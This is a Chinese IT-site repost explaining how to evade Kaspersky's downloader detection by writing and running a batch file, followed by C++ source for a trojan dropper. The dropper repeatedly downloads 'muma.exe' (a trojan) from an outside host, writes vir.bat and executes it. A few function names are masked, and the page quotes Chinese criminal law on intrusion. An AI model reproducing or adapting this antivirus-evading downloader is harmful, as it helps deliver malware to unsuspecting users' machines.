免责声明:本站系公益性非盈利IT技术普及网,本文由投稿者转载自互联网的公开文章,文末均已注明出处,其内容和图片版权归原网站或作者所有,文中所述不代表本站观点,若有无意侵权或转载不当之处请从网站右下角联系我们处理,谢谢合作!
卡巴检测的机理是:文件下载a.exe->文件运行a.exe(判断为下载者) 新的思路:文件下载a.exe->写run.bat->运行run.bat(不判断为下载者) ##不提供下载,程序关键部分已经修改## 刑法第285条规定,违反国家规定,侵入国家事务、国防建设、尖端科学技术领域的计算机信息系统的,处三年以下有期徒刑或者拘役。 刑法修正案(七)在刑法第285条中增加两款(第二款、第三款): “违反国家规定,侵入前款规定以外的计算机信息系统或者采用其他技术手段,获取该计算机信息系统中存储、处理或者传输的数据,或者对该计算机信息系统实施非法控制,情节严重的,处三年以下有期徒刑或者拘役,并处或者单处罚金;情节特别严重的,处三年以上七年以下有期徒刑,并处罚金。” “提供专门用于侵入、非法控制计算机信息系统的程序、工具,或者明知他人实施侵入、非法控制计算机信息系统的违法犯罪行为而为其提供程序、工具,情节严重的,依照前款的规定处罚。” /* Author: Friddy Email:qianyang@ssyeah.com QQ:568623 */ #include "stdafx.h" #include <iostream.h> #include <fstream.h> #include <UrlMon.h> #include <string.h> #include <windows.h> #pragma comment(lib, "urlmon.lib") int APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) { char muma[]="http://www.friddy.cn/muma.exe"; // TODO: Place code here. while(true){ HRESULT hr = URLDownloadToXXXXXXXXX(0, muma,"C:\\ma.exe", 0,NULL); if (hr== S_OK) { const char filename[] = "c:\\vir.bat"; ofstream o_file; o_file.open(filename); o_file <<"echo off"<<endl; o_file <<"C:\\ma.exe"<<endl; o_file.close(); WinExec("C:\\vir.bat",0); return 0; Sleep(10000); } } return 0; } |
小编推荐:欲学习电脑技术、系统维护、网络管理、编程开发和安全攻防等高端IT技术,请 点击这里 注册账号,公开课频道价值万元IT培训教程免费学,让您少走弯路、事半功倍,好工作升职加薪! 免责声明:本站系公益性非盈利IT技术普及网,本文由投稿者转载自互联网的公开文章,文末均已注明出处,其内容和图片版权归原网站或作者所有,文中所述不代表本站观点,若有无意侵权或转载不当之处请从网站右下角联系我们处理,谢谢合作! |